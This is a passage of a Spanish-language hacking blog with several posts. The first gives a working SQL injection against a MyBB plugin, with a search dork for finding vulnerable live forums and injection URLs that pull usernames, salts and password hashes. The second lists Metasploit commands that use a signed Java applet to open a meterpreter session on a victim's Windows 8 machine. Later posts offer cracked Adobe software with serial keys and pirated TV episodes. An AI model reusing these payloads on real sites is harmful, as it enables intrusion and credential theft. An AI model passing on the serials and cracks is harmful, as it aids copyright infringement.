[H]ACKMUNDY - [L]ABS

Bienvenidos a [H]ACKMUNDY - [L]ABS....

Backtrack

Aprende Conceptos Basicos de Backtrack...

Informatica

Blog dedicado para Aprende y entender la Informatica......

Programacion

Aprende Nociones Basicas para iniciarte en la programacion...

Personalizacion

Aprende a Personalizar tu PC, blog........

martes, 27 de noviembre de 2012

Explotando SQL Injection 0-day en Foros MyBB

Hace unos días PonyBlaze descubrió una Vulnerabilidad de SQL Injection en los servidores webs basados en MyBB versiones 1.5 en el Plugin Follower User.

La descripción de dicha Vulnerabilidad se puede apreciar desde el siguiente link: 
 
En la descripción se puede apreciar que la Vulnerabilidad existe dentro del archivo SuscribeUsers.php en SuscribeUsers_add():
-------------------------------------------------------------------------------------------------------------
<?
$usid = $mybb->input[usid]; //Line 671
$uid = $mybb->input[uid]; //Line 672
if(user_awaiting($uid,$usid)) //Line 781
{ //Line 782
redirect("member.php?action=profile&uid=".$usid."#suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
} //Line 784
?>
-------------------------------------------------------------------------------------------------------------
Entonces como ya sabemos en que parte de la web se encuentra la vulnerabilidad, procederemos a poner en practica este bug, para ello buscaremos webs vulnerables con la siguiente dork:
  • intext:"Users subscribed to" inurl:member.php
Esta nos mostrara muchas webs vulnerables, la cual al momento de abrir algun link, automáticamente nos redireccionara a la siguiente dirección:
  • www.sitio-web.com/member.php?action=profile&uid=29
Dicha dirección mostrara el modulo "Users subscribed to hansip" tal y como se aprecia en la siguiente imagen:
La opción "Suscribe to this user" solo se mostrara siempre y cuando estemos registrado en dicho foro, esto es muy esencial ya que ahí es donde inyectaremos los parámetros.
Para proseguir con la explotación de esta vulnerabilidad, se recomienda utilizar el navegador Firefox y el addon HackBar
Luego presionamos clic derecho sobre la opcion "Suscribe to this user", clickeamos en "Copy Link Location" y lo pegaremos en el HackBar, quedando de la siguiente manera:
  • http://www.sitio-web.com/misc.php?suscriberuser=yes&usid=29&uid=242
Entonces a partir de alli inyectaremos, por ejemplo si queremos obtener algún usuario, inyectaremos de la siguiente manera:
  • http://www.sitio-web.com/misc.php?suscriberuser=yes&usid=' and(select 1 from(select count(*),concat((select username from mybb_users where uid=2),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - =173&uid=242
En este caso la web que he cogido como prueba, devuelve el usuario 'bolod1' tal y como se muestra en la siguiente imagen:
Ahora para obtener el SALT, inyectaremos el mismo codigo anterior, cambiando 'username' por 'salt', por ejemplo:
  • http://www.sitio-web.com/misc.php?suscriberuser=yes&usid=' and(select 1 from(select count(*),concat((select salt from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - =173&uid=242
Como vemos, la inyección que colocamos devuelve como resultado '7PEBczOu1' la cual viene hacer el SALT.
De igual forma, si queremos obtener el password respectivo, solo cambiamos 'salt' por 'password', por ejemplo:
  • http://www.sitio-web.com/misc.php?suscriberuser=yes&usid=' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - =173&uid=242
El resultado de la inyeccion es '3379f9b255f76ca0f6e58e146604fe501' la cual viene hacer el password del usuario (bolod1) obtenido lineas arriba.
Entonces los resultados finales basándose en el SALT, serian:
Username: bolod
Password: 79f9b255f76ca0f6e58e146604fe50
CONCLUSIÓN:
MyBB desde hace mucho tiempo no tiene vulnerabilidades tan grave como lo expresado lineas arriba, por lo que se recomienda actualizar el servidor web a una versión mas actual.
El tutorial es solo con fines EDUCATIVOS, cualquier uso malintencionado de la misma es responsabilidad entera de cada uno.
Saludos.
 

Explotando Windows 8 desde Metasploit


Segun Wikipedia: Windows 8 es la versión actual del sistema operativo de Microsoft Windows, producido por Microsoft para su uso en computadoras personales, incluidas computadoras de escritorio en casa y de negocios, computadoras portátiles, netbooks, tabletas, servidores y centros multimedia. Añade soporte para microprocesadores ARM, además de los microprocesadores tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido modificada para hacerla más adecuada para su uso con pantallas táctiles, además de los tradicionales ratón y teclado.
Segun Yo: La seguridad que ofrece Microsoft en esta nueva version de Windows, es la misma que se obtiene al instalar Windows 7, esto se debe a que efectivamente solo ha cambiado la interfaz grafica y ha añadido nuevos programas que lo hace mas vulnerable, simplemente por ser una version parecida a los que usan los Telefonos Moviles. La actualizacion automatica que brinda, solo sirve para actualizar el Internet Explorer y los servicios (Redes Sociales - Correo y Multimedia). El Windows Defender que se integra por default, no detecta las URL maliciosas (Exploits Kit's) ni mucho menos cuando se intenta descargar algun archivo ejecutable, solamente se pronuncia el aviso que brindan los navegadores "Desea descargar este Archivo (Permitir - Rechazar)" que es lo unico que al menos nos alerta de un supuesto Malware, por lo que simplemente Windows 8 seria el WINDOWS XP 2012.

Llegando a la conclusion y opinion personal sobre Windows 8, decide realizar las pruebas respectivas para comprobar realmente y estar 100% seguro de lo mencionado lineas arriba. Para tal caso me base en la vulnerabilidad que se puede aprovechar en todos los navegadores, la cual consiste en ejecutar cualquier URL que genera el Metasploit para poder penetrar un Windows actualizado y parcheado.
El procedimiento que realize para comprometer la seguridad de Windows 8 son los siguientes:
REQUERIMIENTOS:
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows 8 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:

------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_signed_applet (Modulo Java para diferentes navegadores)
set lhost 192.168.1.17 (IP del Atacante) 
set lport 80 (Puerto)
set uripath / (Path del link a enviar)
exploit
------------------------------------------------------------------------------------------------------------------



Despues de ejecutar los comandos mencionados, MSF generara una URL (http://192.168.1.17:8080) que sera enviada a la victima con Windows 8, esta contendra un archivo (.exe) que se autoejecutara al momento de abrirlo en cualquier navegador web, ya sea en Internet Explorer 10 (version que integra Windows 8) Google Chorme, Opera o Firefox.

He aqui un ejemplo de la session meterpreter que se crea al momento de ejecutar la URL generada por Metasploit:




Esto quiere decir que hemos VULNERADO el Windows 8 con una simple URL, seguidamente ejecutaremos los comandos correspondientes para obtener la informacion del sistema.
Las pruebas fueron realizadas en el Sistema Operativo Windows 8 con el Firewall, Windows Defender, Actualizaciones Automaticas, Internet Explorer 10 (modo seguro) respectivamente ACTIVADO.
Si desean realizar sus propias Pruebas de Seguridad, pueden descargar el Windows 8 e instalarlo en una Maquina Virtual, recomendable usar el VMWARE, los .iso se encuentran disponibles desde los siguientes link's:
Saludos.
 

[PAPER] Penetration Testing with BackTrack









INTRODUCCIÓN

MÉTODOS DE ANÁLISIS DE APLICACIONES WEB

Network Mapping
Information Gathering
CMS Identification
IDS/IPS Detection
Open Source Analysis
Web Crawlers
Vulnerability Assessment and Exploitation
Maintaining Access

NETWORK MAPPING

Nmap
Netifera

INFORMATION GATHERING

TheHarvester
Maltego

CMS IDENTIFICATION

BlindElephant
CMS-Explorer
WhatWeb

IDS/IPS DETECTION

Waffit

OPEN SOURCE ANALYSIS

GHDB (Google Hacking DataBase)
Xssed

WEB CRAWLERS

WebShag
DirBuster

VULNERABILITY ASSESSMENT AND EXPLOITATION

JoomScan
SqlMap
Fimap
Shodan
W3af
Uniscan
Nikto

MAINTAINING ACCESS

Weevely
WeBaCoo
MsfPayload

CONCLUSIÓN

DOWNLOAD

VER ONLINE

lunes, 19 de noviembre de 2012

Cómo instalar OpenSuSE paso a paso






OpenSUSE es el nombre de la distribución y proyecto libre auspiciado por Novell y AMD3 para el desarrollo y mantenimiento de un sistema operativo basado en Linux. Antes de la aparición de openSUSE, el desarrollo de esta distribución, anteriormente conocida como SUSE Linux, se realizaba a puerta cerrada. Ahora, el proceso está abierto a cualquier programador y usuario que desee contribuir al desarrollo de openSUSE.

Esta distribución es elegida sobre todo por su estabilidad, sencillez de uso y buen rendimiento. Cuenta con un buen número de programas en sus repositorios exclusivos y se le puede instalar cualquier entorno de escritorio, aunque es más común utilizar KDE, ya que se integra muy bien con el sistema. El instalador es uno de los más completos, permitiendo configurar gran parte de tu sistema antes de instalarlo.
Para realizar esta instalación utilizaré openSUSE 11.4, y lo haré a través de VirtualBox en un disco duro virtual de 8GB al que no crearé partición alguna para que podamos ver lo facil que es crearlas durante la instalación.
Empezamos por descargar la última versión  y quemarla en un DVD o PenDrive. Una vez hecho, iniciamos nuestro ordenador con el medio externo que hayamos elegido configurando nuestra BIOS para que inicie desde dicho medio.
Lo primero que vemos es una pantalla de bienvenida y acto seguido entramos en la pantalla desde donde vamos a instalar.
Para sentirnos más cómodos, lo primero que haremos es elegir nuestro idioma, para ello pulsamos F2:
En la siguiente pantalla marcamos Instalación.

En la siguiente, tampoco hay que hacer mucho más, ya que la distribución de teclado saldrá por defecto al haber elegido el idioma antes.

Una vez que pulsamos en Siguiente el instalador comenzará a comprobar el sistema:

En esta pantalla marcamos Instalación nueva y nos aseguramos de que la casilla Utilizar configuración automática también quede marcada, ya que esto hará que configure el hardware de nuestro PC automáticamente antes de finalizar la instalación. Luego pulsamos en Siguiente:

Llegamos a la pantalla de la zona horaria, elegimos nuestra ubicación y continuamos.

En este momento, tenemos que elegir el tipo de escritorio que vamos a utilizar. Ahora sólo nos deja poner uno, pero más adelante veremos cómo instalar más.

Llegamos al momento de escoger el disco o las particiones. En mi caso sólo hay un disco y vemos que el instalador nos propone una forma de particionado. Una partición mínima de 5gb para el sistema de archivos, una partición de intercambio (swap) y el resto para nuestro /home o carpeta personal, que como vemos nos lo deja en una partición aparte, algo muy recomendable, ya que si en un futuro tenemos que formatear o se nos estropea el sistema de archivos, siempre dispondremos de nuestras configuraciones y archivos importantes a salvo.
Si estamos de acuerdo con lo que nos proponen sólo tenemos que continuar, pero si queremos personalizarlo podemos pulsar en Editar configuración de particiones.

En esta pantalla podemos elegir cualquiera de las particiones propuestas y editarlas con el botón derecho del ratón.

Aquí vemos que podemos escoger el tipo de sistema de archivos de la partición, si queremos formatearla, el punto de montaje (en este caso /home), o incluso poder editar el archivo /fstab, (si tenemos conocimientos para ello). Cuando lo tengamos a nuestro gusto pulsamos en Terminar.

Después de lo anterior volveremos a la pantalla de particionado del disco donde comprobamos que todo esté correcto y pulsamos Siguiente.

El último paso de la instalación es crear nuestro usuario con su correspondiente contraseña y nos aseguramos de desmarcar la casilla inicio de sesión automático ya que voy a instalar más de un escritorio y quiero que me deje elegir al inicio de sesión.

Aquí nos encontramos con un resumen de lo que se va a instalar y es el momento para comprobar que todo está como queremos. En este punto ya podemos empezar con la instalación.

Si queremos cambiar algo, todavía estamos a tiempo. Sólo tenemos que pulsar en Cambiar…, resalto la entrada Arranque… porque en ella podemos cambiar las opciones del GRUB, así como el disco o partición donde instalarlo, aunque recomiendo dejarlo tal como está por defecto.
 Como podemos ver, en la pestaña Gestión de la sección podemos editar la opciones del GRUB.

Mejor no tocar nada si no sabemos bien lo que hacemos.

La función de la pestaña Instalación del cargador de arranque, es justo eso, diferentes opciones para instalar GRUB o LILO.

En mi caso quiero instalar más de un tipo de escritorio, por lo que también voy a cambiar en Software
En esta pantalla podemos seleccionar el software adicional que queremos en nuestro sistema o desmarcar el que no queramos. Yo voy a instalar Gnome y XFCE y desmarco los juegos.

Una vez aceptado lo anterior, tenemos que confirmar la instalación.

Ahora sólo nos queda esperar a que el instalador haga su trabajo…

Cuando termine la instalación el sistema se reiniciará…

… y al volverse a iniciar comenzará a configurar automáticamente nuestro hardware gracias a que al comienzo de la instalación dejábamos marcada la casilla Utilizar configuración automática.



Una vez terminada la configuración, nos sale la pantalla de inicio donde tenemos que poner nuestro Usuario y contraseña, pero antes de entrar podemos seleccionar uno de los escritorios instalados anteriormente (si es el caso).

Abajo a la izquierda, pulsamos Tipo de sesión y vemos que se puede escoger iniciar con cualquiera de los tipos de escritorio instalados anteriormente.

Con KDE…

… con Gnome…

… y XFCE.
A partir de aquí queda en vuestras manos.
Si queréis más información o descargar otras versiones podéis visitar la pagina  openSUSE.org

Formatear Pendrive desde la Terminal


Edito: Se me olvidaba decir que para ejecutar esta operación, el dispositivo tiene que estar desmontado. 

Cuando no tenemos a mano una herramienta gráfica como GParted o la opción de formatear memorias como en Gnome, podemos usar un comando que en realidad hace lo mismo que las dos herramientas antes mencionadas.
Lo primero que tenemos que hacer, es asegurarnos de tener instalado el paquete dosfstools.

$ sudo aptitude install dosfstools

Una vez instalado, pasamos a comprobar donde se encuentra nuestra memoria flash. Podemos hacer uso del comando:

$ sudo fdisk -l

Lo cual nos devolverá algo como esto:

La línea que nos interesa es la que dice:

/dev/sdc1  *      62       7983863     3991901   b  W95 FAT32

Una vez que sabemos cual es el dispositivo a formatear, usamos el comando:

sudo mkfs.vfat -F 32 -n Mi_Memoria /dev/sdc1

Con la opción -F 32 le decimos que será formateada como Fat32, y con la opción -n le ponemos una etiqueta o nombre al dispositivo.
 
¿Sencillo verdad?


miércoles, 14 de noviembre de 2012

Adobe After Effect CS4[Full][Español]



Adobe Effects CS4 Multilenguaje Español Full
Mult.Español | 938 Mb | Iso | Incluy.Medicinas | Pass:www.detodoprogramas.com

Descripción:
After Effects es una aplicación en forma de estudio destinado para creación o aplicación en una composición (realización de gráficos profesionales en movimiento) de efectos especiales y grafismo de video que desde sus raíces han consistido básicamente en la superposición de imagenes Adobe After Effects es uno los softwares basado en Linea de tiempo (A diferencia de Nuke o Apple Shake que funcionan a base de nodos “One Shot compositing”) más potentes del mercado junto con Autodesk Combustion y Eyeon Fusion.

Requisitos de Sistema:


  • CPU a 1.5 GHz o más
  • Windows XP SP2 o Windows Vista SP1 (Certificado para XP 32 bits y Vista 32/64 bits)
  • 2 GB de RAM Minimo 1 GB pero es poco lento
  • 1,3 GB de espacio disponible en el disco duro para la instalación
  • Software QuickTime 7.4.5 necesario para utilizar las funciones de QuickTime
  • Resolucion de 1.280 x 900
Capturas:



Descargar:
Parte 1 | Parte 2 | Parte 3

1 Link
Crack

Seriales:

1325-1915-0550-2855-0726-7107
1325-1823-8364-7449-0103-2911
1325-1033-9351-7661-8406-9874
1325-1221-9130-5694-2806-5055
1325-1025-6371-7149-5529-6130
1325-1863-2127-2888-9099-4617


Version Portable CS5 Para 64 bits Con suerte podria cojer en 32 bits pero es una suerte XD

Parte 1
Parte 2
Parte 3

Password “smin
Espero que os sea útil, un saludo y hasta pronto!!!

Descarga Photoshop CS4 en Español Gratis [Comprimido 64 MB]

Hola ya sabemos que para usar Photoshop CS6 Necesitamos un Procesador de arquitectura de 64 bits por eso dejo este Photoshop CS4 para users que usen 32 bits..

Contenido del archivo:

*Abobe Photoshop CS4
*Traduccion Multilenguaje AdobePhotoshop CS4


Para que sirve el Multilenguaje?

El Multilenguaje es para por si te sale en ingles u otro idioma, debes darle click a eso y se te pondra en español.






Descarga:

Aqui

dobe Photoshop CS6 Multilenguaje (Español) (WIN/MAC)





Adobe Photoshop CS6 v13.0.1 EXTENDED FINAL Multilenguaje
Idiomas: da-DK, de-DE, es-ES, es-MX, fi-FI, fr-FR, fr-CA, it-IT, nb-NO, nl-NL, pt-BR, sv-SE | x86 & x64 | 1.3 GB | 986 MB | Medicina Incl. | WIN/MAC |


Descripción
El software Adobe® Photoshop® CS6 Extended ofrece la magia de las imágenes de última generación, nuevas opciones creativas y un rendimiento sin igual. Retoque con más precisión y cree de manera intuitiva gráficos en 3D, diseños en 2D y películas enteras mediante las herramientas y flujos de trabajo nuevos y renovados. Vea las principales funciones nuevas de Photoshop CS6 Extended
Aumente su productividad y mejore su creatividad con las nuevas herramientas pioneras basadas en contenido, el nuevo motor Adobe Mercury Graphics Engine, la creación de ilustraciones 3D simplificada, las herramientas de diseño reestructuradas y mucho más.

Cree gráficos 3D con facilidad
Descubra una manera fácil de crear ilustraciones 3D con una interfaz de usuario intuitiva, y perfeccione sus creaciones 3D con sombras, iluminación, animación y nuevos bocetos y dibujos animados.
Maximice su creatividad
Experimente avances creativos con herramientas de diseño nuevas y mejoradas. Cree vídeos de forma intuitiva dentro del entorno conocido de Photoshop. Cree desenfoques fotográficos personalizados, y pinte y dibuje de forma más expresiva.

Requerimientos del Sistema
Windows
  • Procesador Intel® Pentium® 4 o AMD Athlon® de 64 bits
  • Microsoft® Windows® XP* con Service Pack 3 o Windows 7 con Service Pack 1
  • 1 GB de RAM
  • 1 GB de espacio disponible en el disco duro para la instalación; se necesita espacio libre adicional durante la instalación (no se puede instalar en dispositivos de almacenamiento flash extraíbles)
  • Resolución de pantalla de 1024 x 768 (se recomienda 1280 x 800) con color de 16 bits y 256 MB (se recomiendan 512 MB) de VRAM
  • Sistema compatible con OpenGL 2.0
  • Unidad de DVD-ROM
  • Este software no funcionará si no se activa. Conexión a Internet de banda ancha y registro necesarios para la activación del software, la validación de las suscripciones y el acceso a los servicios online†. No es posible activarlo por teléfono.
Mac OS

  • Procesador Intel multinúcleo con compatibilidad de 64 bits
  • Mac OS X v10.6.8 o v10.7
  • 1 GB de RAM
  • 2 GB de espacio disponible en el disco duro para la instalación; se necesita espacio libre adicional durante la instalación (no se puede instalar en un volumen que utilice un sistema de distinción entre mayúsculas y minúsculas en archivos, ni en dispositivos de almacenamiento flash extraíbles)
  • Resolución de pantalla de 1024 x 768 (se recomienda 1280 x 800) con color de 16 bits y 256 MB (se recomiendan 512 MB) de VRAM
  • Sistema compatible con OpenGL 2.0
  • Unidad de DVD-ROM
  • Este software no funcionará si no se activa. Conexión a Internet de banda ancha y registro necesarios para la activación del software, la validación de las suscripciones y el acceso a los servicios online†. No es posible activarlo por teléfono.

* Algunas funciones activadas de la GPU no son compatibles con Windows XP.


Para Windows
Aqui

Para Mac 
Aqui


Sólo Medicina: Patchamtlib.dllamtlib.for.MACENGiNEiOTA



The Walking Dead Temporada 1 Completa Español Latino Descargar HDTV

Hola hoy les traigo una serie que me gusta, se que no es relacionada a Informatica ni hacking pero talvez a alguien le guste, se trata sobre zombies....


The Walking Dead Temporada 1 Completa Español Latino 480p HD

The Walking Dead Temporada 1 Disponible para Descargar en Calidad HD 480p Audio Español Latino 2010 Serie de TV (2010-Actualidad). Narra la historia de un apocalipsis zombie. Un grupo de supervivientes, dirigidos por el policía Rick Grimes, viaja a través de los Estados Unidos Tratando de poner sus vidas a salvo. Rick es el ayudante del Sheriff de un pueblo de Georgia, que permaneció en coma durante la irrupción de la plaga. Aunque el leit motiv de la serie -cuyo episodio piloto está dirigido y escrito por Frank Darabont- sea el apocalipsis zombie, la narración se centra más en las relaciones entre los personajes, su evolución y comportamiento en las situaciones críticas.

TÍTULO ORIGINAL: The Walking Dead
AÑO: 2010
DURACIÓN: 45 min.
PAÍS: Estados Unidos


GÉNERO: Serie de TV. Terror. Ciencia ficción | Zombis. Futuro postapocalíptico. Gore. Cómic

PREMIOS
2010: Nominada al Globo de Oro: Mejor Serie de TV drama
2010: 3 nominaciones al Emmy: Mejor maquillaje, Efecto visuales, montaje sonoro.

CAPTURAS
The Walking Dead Temporada 1 Completa Español Latino 480p HD The Walking Dead Temporada 1 Completa Español Latino 480p HD The Walking Dead Temporada 1 Completa Español Latino 480p HD The Walking Dead Temporada 1 Completa Español Latino 480p HD The Walking Dead Temporada 1 Completa Español Latino 480p HD

The Walking Dead Season 1

The Walking Dead Temporada 1 Completa Español Latino 480p HD

Lista de Capitulos
1. Days Gone Bye
2.  Guts
3. Tell It to the Frogs
4. Vatos
5. Wildfire
6. TS-19

Esta Serie consta de 8 Partes7 de 500MB c/u y 1 de 246MB


Espero que les guste..
Contraseña: compucalitv

EDITO:

Si tienen problemas con los link de arriba aca estan otro server los enlaces son intercamiable.

Forma 1
Forma 2
Forma 3


Saludos..

Web hosting